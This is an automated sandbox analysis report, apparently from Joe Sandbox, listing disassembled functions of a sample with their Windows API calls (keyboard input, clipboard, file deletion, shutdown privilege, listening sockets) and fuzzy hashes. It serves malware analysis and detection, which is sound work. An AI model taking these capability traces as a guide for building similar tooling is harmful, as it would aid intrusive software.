Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 4b76b592c6679f431dc3596f756be8cd16a6a0a490a4f7f1a1401cd997b94ef1
Instruction ID: d589e712306399073522d1aac5ced109870c8b987b37c22b9ffb9f72223165ac
Opcode Fuzzy Hash: 4b76b592c6679f431dc3596f756be8cd16a6a0a490a4f7f1a1401cd997b94ef1
Instruction Fuzzy Hash: 2541C4345047CA6DFF708A6498047B5BEB06B51304F08619BD9C6577C2EAACD9E8CFE2

Function 007D443D Relevance: 15.1, APIs: 10, Instructions: 108windowCOMMON

Download Yara Rule

APIs

__swprintf.LIBCMT ref: 007D4451
__swprintf.LIBCMT ref: 007D445E

Part of subcall function 007938C8: __woutput_l.LIBCMT ref: 00793921

FindResourceW.KERNEL32(?,?,0000000E), ref: 007D4488
LoadResource.KERNEL32(?,00000000), ref: 007D4494
LockResource.KERNEL32(00000000), ref: 007D44A1
FindResourceW.KERNEL32(?,?,00000003), ref: 007D44C1
LoadResource.KERNEL32(?,00000000), ref: 007D44D3
SizeofResource.KERNEL32(?,00000000), ref: 007D44E2
LockResource.KERNEL32(?), ref: 007D44EE
CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 007D454F

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
String ID:
API String ID: 1433390588-0
Opcode ID: 66ca1e44739a7b823ccabf518ce40b280085016c80ef91204ace50762af33562
Instruction ID: 9e58948659f9e8fa2296819beae02d78ac3bf3dcbcb6d89d8cd9adfcb1634282
Opcode Fuzzy Hash: 66ca1e44739a7b823ccabf518ce40b280085016c80ef91204ace50762af33562
Instruction Fuzzy Hash: 94317E7150125AABDF119FA0EC49EBB7BB8FF04301F004826F916D6251EB78DA61CBB0

Function 007E4830 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 007E4857
EmptyClipboard.USER32 ref: 007E485D
GlobalAlloc.KERNEL32(00000002,?), ref: 007E4872
CloseClipboard.USER32 ref: 007E4911

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: 6be783b75bbcd7985c2ce6de17fe8b969f084bfc684a80e93f4e48ed5b234e60
Instruction ID: 5a8e88fd8cd5bbae52288570fe0f658254f2c06f46fcefa298c2d325fa5c0573
Opcode Fuzzy Hash: 6be783b75bbcd7985c2ce6de17fe8b969f084bfc684a80e93f4e48ed5b234e60
Instruction Fuzzy Hash: 8B219131205250EFDB51AF25EC09F2E77A9FF98711F008019F94A9B261CB39AD00CF95

Function 007D3CE2 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00790284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00782A58,?,00008000), ref: 007902A4

Part of subcall function 007D4FEC: GetFileAttributesW.KERNEL32(?,007D3BFE), ref: 007D4FED

FindFirstFileW.KERNEL32(?,?), ref: 007D3D96
DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 007D3E3E
MoveFileW.KERNEL32(?,?), ref: 007D3E51
DeleteFileW.KERNEL32(?,?,?,?,?), ref: 007D3E6E
FindNextFileW.KERNEL32(00000000,00000010), ref: 007D3E90
FindClose.KERNEL32(00000000,?,?,?,?), ref: 007D3EAC

Strings

\*.*, xrefs: 007D3D41, 007D3D4A, 007D3D5F

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
String ID: \*.*
API String ID: 4002782344-1173974218
Opcode ID: b948de47856503188a42abc8aca01d73afde9037ca136aab7b970f3e70bd79bc
Instruction ID: b000644190952bd17356e2caa7984847fff811a5fc2eb415d45e646bded8a1e7
Opcode Fuzzy Hash: b948de47856503188a42abc8aca01d73afde9037ca136aab7b970f3e70bd79bc
Instruction Fuzzy Hash: 5A51843184114DEACF15FBA0D99A9EDB779AF10301F644166E441B3291DF396F0ACB61

Function 007DFA36 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00781A36: _memmove.LIBCMT ref: 00781A77

FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 007DFA83
FindClose.KERNEL32(00000000), ref: 007DFB96

Part of subcall function 007752B0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 007752E6

Sleep.KERNEL32(0000000A), ref: 007DFAB3
_wcscmp.LIBCMT ref: 007DFAC7
_wcscmp.LIBCMT ref: 007DFAE2
FindNextFileW.KERNEL32(?,?), ref: 007DFB80

Strings

*.*, xrefs: 007DFA68

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: Find$File_wcscmp$CloseFirstMessageNextPeekSleep_memmove
String ID: *.*
API String ID: 2185952417-438819550
Opcode ID: 9b39e3f25ab86f1ee8726a6a13c2c0bc3c68e86cf26caa163c8a93ea723f8361
Instruction ID: 041429db76404c4aa29c9b2ec19bbfddb8b00ff239347ffada9bc777d72e0d18
Opcode Fuzzy Hash: 9b39e3f25ab86f1ee8726a6a13c2c0bc3c68e86cf26caa163c8a93ea723f8361
Instruction Fuzzy Hash: 4C4170B194021A9FCF14DF64CC59AEEBBB8FF05350F548167E819A2291EB389E45CF90

Function 007D5778 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 007C9399: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 007C93E3
Part of subcall function 007C9399: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 007C9410
Part of subcall function 007C9399: GetLastError.KERNEL32 ref: 007C941D

ExitWindowsEx.USER32(?,00000000), ref: 007D57B4

Strings

, xrefs: 007D57A2
SeShutdownPrivilege, xrefs: 007D5784
@, xrefs: 007D57A7

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $@$SeShutdownPrivilege
API String ID: 2234035333-194228
Opcode ID: 77fa3dc330809d3d1c27983f88b77a31547152811cedd9d79a65ea27466869f1
Instruction ID: b1c999189ad5600f9ea08af4e31665447676f41227cd8bf244a0ad1243f54cb3
Opcode Fuzzy Hash: 77fa3dc330809d3d1c27983f88b77a31547152811cedd9d79a65ea27466869f1
Instruction Fuzzy Hash: E601F731751712EBE76862A49C8EFBB7778EB04770F34002BF913D22D2DA685C008550

Function 007E696E Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 007E69C7
WSAGetLastError.WSOCK32(00000000), ref: 007E69D6
bind.WSOCK32(00000000,?,00000010), ref: 007E69F2
listen.WSOCK32(00000000,00000005), ref: 007E6A01
WSAGetLastError.WSOCK32(00000000), ref: 007E6A1B
closesocket.WSOCK32(00000000,00000000), ref: 007E6A2F

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: ErrorLast$bindclosesocketlistensocket
String ID:
API String ID: 1279440585-0
Opcode ID: 263ed1a43b9b069f197d9e9d4d37f140cd4494f2e598be590cb48165a927049f
Instruction ID: cf8312b2dd2087edc50563581911f1cecff112f6444106add1216f27743ddd30
Opcode Fuzzy Hash: 263ed1a43b9b069f197d9e9d4d37f140cd4494f2e598be590cb48165a927049f
Instruction Fuzzy Hash: D6219170600604DFCB50EF64CC49B6EB7A9EF48760F14C569E95AA7391CB78AC01CB91

Function 00771663 Relevance: 7.9, APIs: 5, Instructions: 379COMMON

Download Yara Rule

APIs

Part of subcall function 007729E2: GetWindowLongW.USER32(?,000000EB), ref: 007729F3

DefDlgProcW.USER32(?,?,?,?,?), ref: 00771DD6
GetSysColor.USER32(0000000F), ref: 00771E2A
SetBkColor.GDI32(?,00000000), ref: 00771E3D

Part of subcall function 0077166C: DefDlgProcW.USER32(?,00000020,?), ref: 007716B4

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: ColorProc$LongWindow
String ID:
API String ID: 3744519093-0
Opcode ID: 4b1ea1bb7b606ffbc45aa69047cca9dce068632fb0e838aefa70bd8029e6d779
Instruction ID: bcbe69ac337071af7e32b8414d0688de4443a78c4f5051de83951cb26d526c3a
Opcode Fuzzy Hash: 4b1ea1bb7b606ffbc45aa69047cca9dce068632fb0e838aefa70bd8029e6d779
Instruction Fuzzy Hash: 3DA17CB0305408FADF3C6B6D4C49E7B255EEB82381F94C60AF509D5182CA2DDD01DB75

Function 007DC2FF Relevance: 7.6, APIs: 5, Instructions: 143fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 007DC329
_wcscmp.LIBCMT ref: 007DC359
_wcscmp.LIBCMT ref: 007DC36E
FindNextFileW.KERNEL32(00000000,?), ref: 007DC37F
FindClose.KERNEL32(00000000,00000001,00000000), ref: 007DC3AF

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: Find$File_wcscmp$CloseFirstNext
String ID:
API String ID: 2387731787-0
Opcode ID: c194317a40a14fdb8ccd2899b67cf454a7abe847fb8ee71dcf648c22665d8a72
Instruction ID: 0cb071ff5d46cf231230197d72d287112c8b6f4a232a95bc02ba35af4a54471a
Opcode Fuzzy Hash: c194317a40a14fdb8ccd2899b67cf454a7abe847fb8ee71dcf648c22665d8a72
Instruction Fuzzy Hash: F1518935604602CFD715DF68D494AAAB7E8FF49320F10861EE95ACB3A1DB38AD05CB91

Function 007E6E32 Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON

Download Yara Rule

APIs

Part of subcall function 007E8475: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 007E84A0

socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 007E6E89
WSAGetLastError.WSOCK32(00000000), ref: 007E6EB2
bind.WSOCK32(00000000,?,00000010), ref: 007E6EEB
WSAGetLastError.WSOCK32(00000000), ref: 007E6EF8
closesocket.WSOCK32(00000000,00000000), ref: 007E6F0C

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: ErrorLast$bindclosesocketinet_addrsocket
String ID:
API String ID: 99427753-0
Opcode ID: ad4ea584d76a8af8a8a2c852a302c4342d13e71ae3cf76b62cf86999e8ebecaa
Instruction ID: 3362a015bb197b51cbeb8119b50da4b303183dc377c90e9646091b2f912456fc
Opcode Fuzzy Hash: ad4ea584d76a8af8a8a2c852a302c4342d13e71ae3cf76b62cf86999e8ebecaa
Instruction Fuzzy Hash: 4E41A275700214EFDF20AF649C8AF6E77A8EB48750F04C558FA59AB3D2DB789D008B91

Function 007F59B3 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 007F5A02
IsWindowEnabled.USER32 ref: 007F5A10
GetForegroundWindow.USER32(?,?,00000001), ref: 007F5A1D
IsIconic.USER32 ref: 007F5A2B
IsZoomed.USER32 ref: 007F5A39

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: 24cfeb951b01e72b2579a46bca282bd1e0f6c651eceb7fa05e2c6fc320665990
Instruction ID: 5b133b7e595ab629ac2b2321df30444571014090c74fd16f4f5e1cadc6a2b59f
Opcode Fuzzy Hash: 24cfeb951b01e72b2579a46bca282bd1e0f6c651eceb7fa05e2c6fc320665990
Instruction Fuzzy Hash: 1D118672300A159FEB215F26DC88B3A7B99FF44761F058129EA45D7341DB78AD118ED0

Function 007EC6D9 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,007B027A,?), ref: 007EC6E7
GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 007EC6F9

Strings

GetSystemWow64DirectoryW, xrefs: 007EC6F3
kernel32.dll, xrefs: 007EC6E2

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetSystemWow64DirectoryW$kernel32.dll
API String ID: 2574300362-1816364905
Opcode ID: 201d458a5440980e2ee2fd8f40bef48817541db2512243b2162742db15d25976
Instruction ID: b298d36120eef0f6e7878e64138de2cdee962b043cf72cad33ed92e282eaae7d
Opcode Fuzzy Hash: 201d458a5440980e2ee2fd8f40bef48817541db2512243b2162742db15d25976
Instruction Fuzzy Hash: 7FE0C73C2027528FE7214B2ACC4AB427BE8FF0C308F80842AE895C2350EB78C880CF10

Function 007B0030 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 007B0034
__swprintf.LIBCMT ref: 007B0065

Strings

%.3d, xrefs: 007B003F
WIN_XPe, xrefs: 007B00A4

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: LocalTime__swprintf
String ID: %.3d$WIN_XPe
API String ID: 2070861257-2409531811
Opcode ID: 39c53f23469173fcabb6e3c67fb83ff37c7666309e0c089257d288a37102ac76
Instruction ID: e32425fa2fdb5ee13f476c7b8e9934a9c5e3712eb849db186c88b9f70ee89b9a
Opcode Fuzzy Hash: 39c53f23469173fcabb6e3c67fb83ff37c7666309e0c089257d288a37102ac76
Instruction Fuzzy Hash: 19D01271804218EACB08AA90D848FFB737CFB04300F144052F546E2040D23D9798EB62

Function 007D4254 Relevance: 4.6, APIs: 3, Instructions: 59fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 007D4271
DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 007D42B2
CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 007D42BD

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle
String ID:
API String ID: 33631002-0
Opcode ID: 6c9f8d72f19bd2ed4dd533ef74c3a3f4f8af3ee4f38dc6096560f2aaedf440dc
Instruction ID: 1e198e8d611b819ead56fca744e51151f6a145850397039fc20487773a8fc1ee
Opcode Fuzzy Hash: 6c9f8d72f19bd2ed4dd533ef74c3a3f4f8af3ee4f38dc6096560f2aaedf440dc
Instruction Fuzzy Hash: 72113C75E01228BBDB608FA5EC45BAFBBBCFB45B60F104156FD04E7390C6745A018BA1

Function 007D4F1C Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 007D4F45
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 007D4F5C
FreeSid.ADVAPI32(?), ref: 007D4F6C

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: 92643a1f8b8aa35c43ce10b3757e72eae778d0bb91158a28567355c1a4c00bea
Instruction ID: b7db8dfd7ee21c7d9d56eb66976824ee7aff479899ec66fe71afb54cf1987e94
Opcode Fuzzy Hash: 92643a1f8b8aa35c43ce10b3757e72eae778d0bb91158a28567355c1a4c00bea
Instruction Fuzzy Hash: E9F04975A1130CBFEF00DFE0DC89AAEBBBCFF08201F0044A9A901E2290E7346A048B50

Function 007D1AC6 Relevance: 3.0, APIs: 2, Instructions: 32keyboardCOMMON

Download Yara Rule

APIs

SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 007D1B01
keybd_event.USER32(?,75A4C0D0,?,00000000), ref: 007D1B14

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: InputSendkeybd_event
String ID:
API String ID: 3536248340-0
Opcode ID: 58603dd1903cced3932d45beccbbffaf759559a335564e5d21b0afaa49a7b5c4
Instruction ID: 5970dc8b8b666f4ac481746d60e827d7d247bdb7110dd0f692055dc28f87f1b2
Opcode Fuzzy Hash: 58603dd1903cced3932d45beccbbffaf759559a335564e5d21b0afaa49a7b5c4
Instruction Fuzzy Hash: C2F0497190024DABDB04CF94C806BFE7BB4FF04315F00804AF955A6292D3799615DF94

Function 007DA6AD Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,007E9B52,?,0080098C,?), ref: 007DA6DA
FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,?,?,007E9B52,?,0080098C,?), ref: 007DA6EC

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: e467a2131dc03d5dd099a7533cade232cf2e896675c13d63bb78a88688f252c2
Instruction ID: e05b4a3545082b4fa192048f0ee3a701161ab3090e1b8cde3190cb951c1750fc
Opcode Fuzzy Hash: e467a2131dc03d5dd099a7533cade232cf2e896675c13d63bb78a88688f252c2
Instruction Fuzzy Hash: B5F0823550522EFBDB21AFA4CC49FEA776CBF09761F008256B90896281DA349A40CFA1

Function 0079A385 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,?,00798F87,?,?,?,00000001), ref: 0079A38A
UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 0079A393

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
